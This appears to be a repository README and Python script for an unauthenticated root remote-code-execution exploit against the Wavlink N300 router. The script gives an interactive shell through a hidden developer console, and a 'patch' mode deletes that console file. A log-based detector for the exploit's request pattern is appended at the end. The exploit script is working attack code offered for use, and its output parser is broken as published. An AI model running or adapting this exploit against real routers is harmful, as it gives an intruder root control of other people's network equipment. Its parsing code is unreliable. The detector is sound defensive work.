ERAC3000UMNewEMB

WLN300-Exploit-and-patch

Remote code execution exploit code and patch code for the Wavlink N300 router. The exploit requires no authentication; the only precondition is being on the same subnetwork as the router. It gives RCE with root access.

How to use

python3 Exploit.py 192.168.0.1

Disclosure date

04/06/2018

Requirements

pip install requests
python version 3

How does the exploit work?

The router has a hidden developer console that can be accessed over port 80. The program makes requests to that console to emulate a shell, which allows remote code execution on the target.

How does the patch work?

The patch uses the same exploit to remove the vulnerable file (webcmd.shtml), preventing further exploitation.

Warranty

Use this code at your own risk; it comes with no warranty. Never run this code, even the patch, against a Wavlink router that you do not own.

Contribution

Feel free to contribute, as my error testing is not comprehensive.
Also, I have not tested the patch (as this would fix my router and I want to be able to play with other bin files etc. on the router).

exploit.py

import requests
import sys

def main():
    loop = 0
    if len(sys.argv) != 2:
        print("[-]Please supply an ip address")
        print("[ ]python exploit.py ")
        sys.exit(0)
    else:
        ip = sys.argv[1]

    print("[+]Correct number of argv")
    print("[+]WAV-LINK (WL-WN529N2) exploit")
    print("[ ]This is a demo and should only be used on your own equipment")
    print("[ ]Runing this program can brick the router forever, use with caution")

    ans = input("[ ]Red team or Blue team?\n[ ]This tool can be used to exploit or patch the router\n[ ]Press 'Y' to exploit or 'n' to patch the device\n")
    while loop == 0:
        if (ans == "y" or ans == "Yes" or ans == "Y" or ans == "yes"):
            # Exploit mode: submit each typed command to the console form,
            # then fetch the console page and print the command output.
            while(1):
                try:
                    command = input("root@" + ip + ":")
                    r = requests.post("http://" + ip + "/cgi-bin/adm.cgi/", data = {'page':'sysCMD', 'command': command, 'SystemCommandSubmit':'Apply'})
                    r2 = requests.get("http://" + ip + "/webcmd.shtml")
                    find(r2.text)
                except Exception as e:
                    print(e)
                    sys.exit(1)

        elif (ans == "n" or ans == "N" or ans == "no" or ans == "No"):
            # Patch mode: send one command that deletes the console page.
            # Success is reported without inspecting either response.
            command = "rm webcmd.shtml"
            try:
                r = requests.post("http://" + ip + "/cgi-bin/adm.cgi/", data = {'page':'sysCMD', 'command': command, 'SystemCommandSubmit':'Apply'})
                r2 = requests.get("http://" + ip + "/webcmd.shtml")
                print("[ ]Trying to remove developer console")
                print("[+]System patched")
            except Exception as e:
                print(e)
                sys.exit(1)
            loop = 1  # patch is sent once; without this the request repeats forever

        else:
            # Unrecognised answer: ask again instead of spinning in the loop.
            ans = input("[ ]Press 'Y' to exploit or 'n' to patch the device\n")

def find(html):
    # Cuts the command output out of the console page. Both separator strings
    # are empty as published, and str.split('') raises ValueError.
    parsed = html.split('')[1].split('')[0]
    print(parsed)

if __name__ == "__main__":
    main()
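
The two requests exploit.py makes (a POST to /cgi-bin/adm.cgi/ followed by a GET of /webcmd.shtml) form a recognisable pair in HTTP logs from a sensor on the router's network segment. The detector below is an added example, not part of the original repository; the log format, the sample records and the 5-second pairing window are assumptions constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample records (not real traffic), in an assumed sensor format:
# epoch_seconds client_ip router_ip method uri status
SAMPLE_LOG = """\
1528100000 192.168.0.23 192.168.0.1 GET /index.shtml 200
1528100005 192.168.0.57 192.168.0.1 POST /cgi-bin/adm.cgi/ 200
1528100006 192.168.0.57 192.168.0.1 GET /webcmd.shtml 200
1528100031 192.168.0.57 192.168.0.1 POST /cgi-bin/adm.cgi/ 200
1528100032 192.168.0.57 192.168.0.1 GET /webcmd.shtml 200
1528100090 192.168.0.23 192.168.0.1 POST /cgi-bin/adm.cgi 200
1528100400 192.168.0.23 192.168.0.1 GET /webcmd.shtml 404
not a log line
"""

WINDOW = 5  # assumed: max seconds between the POST and the output fetch


def norm(uri):
    """Path only, lower-cased, without query string or trailing slash."""
    return urlsplit(uri).path.rstrip("/").lower()


def detect(log_text, window=WINDOW):
    """Return (findings, skipped). findings maps (client, router) to counts of
    'pair' (POST adm.cgi then GET webcmd.shtml within window) and
    'console_200' (the console page was served at all)."""
    findings = defaultdict(lambda: {"pair": 0, "console_200": 0})
    last_post = {}
    skipped = 0
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 6 or not parts[0].isdigit():
            skipped += 1          # malformed record: count it, do not crash
            continue
        ts, client, router, method, uri, status = parts
        key, path, ts = (client, router), norm(uri), int(ts)
        if method == "POST" and path == "/cgi-bin/adm.cgi":
            last_post[key] = ts
        elif method == "GET" and path == "/webcmd.shtml":
            if status == "200":
                findings[key]["console_200"] += 1
            if key in last_post and 0 <= ts - last_post.pop(key) <= window:
                findings[key]["pair"] += 1
    return dict(findings), skipped
```

A non-zero console_200 count after the patch has been applied means webcmd.shtml is still being served, which the script's "[+]System patched" message does not check.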
